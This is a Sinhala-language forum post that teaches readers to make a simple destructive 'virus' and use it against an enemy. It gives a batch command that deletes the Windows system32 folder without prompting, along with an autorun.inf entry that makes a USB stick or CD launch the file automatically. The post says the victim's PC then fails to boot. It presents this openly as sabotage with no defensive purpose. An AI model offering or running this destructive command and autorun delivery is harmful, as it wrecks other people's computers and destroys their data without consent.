හතුරට දෙමු ගේමක් system 32 නැතිවෙන්නම....

Pink panther

Well-known member
  • Nov 8, 2011
    23,234
    3,134
    113
    36
    ~ ση тнє ƒℓσω ~
    හතුරට දෙමු ගේමක් system 32 නැතිවෙන්නම....

    hacking.gif


    මේක පොඩි වයිරස් එකක් අපි අපේ පීසී එකේම හදලා මොකකට හරි බයින්ඩ් කරලා හෝ පෙන් හෝ සීඩි එකකට ඔටෝ රන් වෙන විදිහකට හදලා අපේ කාගේ හරි හතුරෙක්ට කෙලවන්න පුළුවන්.....
    5.gif
    5.gif
    6.gif
    6.gif


    මෙච්චරයි කරන්න තියෙන්නේ..:D:D ඔය පල්ලෙහා කෝඩ් එක නෝට්පෑඩ් එකට දාලා සේවු ඈස් දීලා මොකක් හරි නමක් ".bat or .cmd" කියලා දෙන්න විතරයි තියෙන්නේ..:P:P


    del c:\windows\system32\*.* /q

    හැබැයි ඉතින් උබලා මේක අතපය තියන් ඉන්න බැරි කමට උබලගේම පීසී එකේ ඩබල් ක්ලික් කරලා මට මුකුත් කියන්න එපා..
    14.gif
    14.gif


    මේක රන් කරාම system 32 ෆෝල්ඩර් එක මකනවා..:yes::yes: ඕෆ් කරලා ඔන් කරන්න ගියොත්
    system can not find the files
    කියනවා..:rolleyes::rolleyes:
    ඒ කියන්නේ ඉතින් බඩු පැකට් කියන එක..:P:P

    මේක ඔටෝ රන් කරවන්නේ මෙහෙමයි..
    නෝට්පෑඩ් එක ඔපෙන් කරලා... ඔය පල්ලෙහා තියන කෝඩ් එක දීලා...

    [autorun]
    OPEN=your_program.BAT


    දැන් මෙතන your_program.BAT කියලා තියන තැනට ඔයාට ඔටෝ රන් කරන්න ඕනේ .bat or .cmd or .exe හෝ මොකක් හරි හදාගත්තු එකේ නම දීලා.. සේව් ඈස් ගිහින් Autorun.inf දීලා සේව් කරන්න..
    පස්සේ මේක පෙන් එකට හෝ සීඩි එකට දාන්න.. අර හදා ගත්තු වයිරස් එකත් එක්ක..

    එච්චරයි..